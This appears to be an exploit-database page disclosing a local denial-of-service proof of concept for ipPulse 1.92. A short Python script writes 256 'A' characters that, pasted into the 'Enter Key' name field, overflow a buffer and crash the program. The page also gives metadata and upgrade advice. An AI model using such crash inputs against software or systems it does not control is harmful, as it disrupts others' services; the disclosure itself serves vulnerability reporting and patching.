header-logo
Suggest Exploit
vendor:
ipPulse
by:
Diego Buztamante
7.8
CVSS
HIGH
Denial of Service (DoS) Local
119
CWE
Product Name: ipPulse
Affected Version From: 1.92
Affected Version To: 1.92
Patch Exists: YES
Related CWE: N/A
CPE: a:netscantools:ippulse
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro x64 es
2019

ipPulse 1.92 – ‘Enter Key’ Denial of Service (PoC)

A buffer overflow vulnerability exists in ipPulse 1.92 when a maliciously crafted input is sent to the 'Enter Key' field. An attacker can exploit this vulnerability to cause a denial of service condition. This can be exploited by running a python code to create a text file containing a 256 byte long string of 'A' characters, copying the content of the text file to the clipboard, clicking on 'Enter Key' in ipPulse.exe, pasting the clipboard content into the 'Name:' field, and clicking 'OK'. This will cause the application to crash.

Mitigation:

Upgrade to the latest version of ipPulse.
Source

Exploit-DB raw data:

# Exploit Title: ipPulse 1.92 - 'Enter Key' Denial of Service (PoC)
# Discovery by: Diego Buztamante
# Discovery Date: 2019-11-18
# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
# Software Link : http://download.netscantools.com/ipls192.zip
# Tested Version: 1.92
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash:
# 1.- Run python code : python ipPulse_1.92.py
# 2.- Open ipPulse_1.92.txt and copy content to clipboard
# 3.- Open ippulse.exe
# 4.- Click on "Enter Key"
# 5.- Paste ClipBoard on "Name: "
# 6.- OK
# 7.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 256
f = open ("ipPulse_1.92.txt", "w")
f.write(buffer)
f.close()